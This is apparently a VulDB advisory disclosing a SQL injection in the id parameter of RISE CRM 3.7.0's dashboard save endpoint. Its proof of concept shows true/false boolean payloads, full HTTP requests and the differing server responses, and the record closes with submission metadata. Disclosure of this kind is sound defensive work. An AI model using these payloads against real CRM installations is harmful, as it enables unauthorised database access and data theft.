| Title | FairSketch RISE - Ultimate Project Manager & CRM 3.7.0 SQL Injection |
|---|
| Description |
A critical SQL Injection vulnerability was discovered in RISE CRM version 3.7.0. The vulnerability requires an attacker to be authenticated as a client, but it is significantly easier to exploit if user/client signup is enabled. The vulnerability arises due to improper sanitization of user input in the id parameter of the /dashboard/save endpoint, allowing attackers to inject SQL commands. This could lead to data leakage, unauthorized database access, or full application compromise. The issue has been fixed in version 3.7.1.
Proof of Concept (PoC):
Here’s an example of the SQL injection payload used in the id parameter.
1. Successful payload( -1 OR 1=1--) :
This payload returns a true condition and produces a valid response from the application.
POST /index.php/dashboard/save HTTP/1.1
Host: 192.168.1.13
Content-Length: 69
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.1.13
Referer: http://192.168.1.13/crm/index.php/dashboard/index/1
Accept-Encoding: gzip, deflate, br
Cookie: ci_session=d4oi0jg15o1ur64cn39f2daqe24p5rpd; rise_csrf_cookie=c54966034a07055643098839120e2146
Connection: keep-alive
Response:
HTTP/1.1 200 OK
.
.
.
Content-Length: [Size]
{"success":true,"dashboard_id":"-1 OR 1=1-- -","message":"The record has been saved."}
2. Failed payload(-1 OR 1=2--) :
This payload evaluates as false and produces a different response, confirming the SQL Injection vulnerability.
POST /index.php/dashboard/save HTTP/1.1
Host: 192.168.1.13
Content-Length: 69
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.1.13
Referer: http://192.168.1.13/crm/index.php/dashboard/index/1
Accept-Encoding: gzip, deflate, br
Cookie: ci_session=d4oi0jg15o1ur64cn39f2daqe24p5rpd; rise_csrf_cookie=c54966034a07055643098839120e2146
Connection: keep-alive
Response:
HTTP/1.1 302 Found
.
.
.
Content-Length: 0
Impact:
Data leakage
Unauthorized database access
Full compromise of the application |
|---|
| Source | ⚠️ https://bytium.com/sql-injection-vulnerability-identified-in-rise-crm/ |
|---|
| User | suffer (UID 74855) |
|---|
| Submission | 09/16/2024 22:07 (2 years ago) |
|---|
| Moderation | 09/17/2024 14:34 (16 hours later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 277762 [CodeCanyon RISE Ultimate Project Manager 3.7.0 save ID sql injection] |
|---|
| Points | 20 |
|---|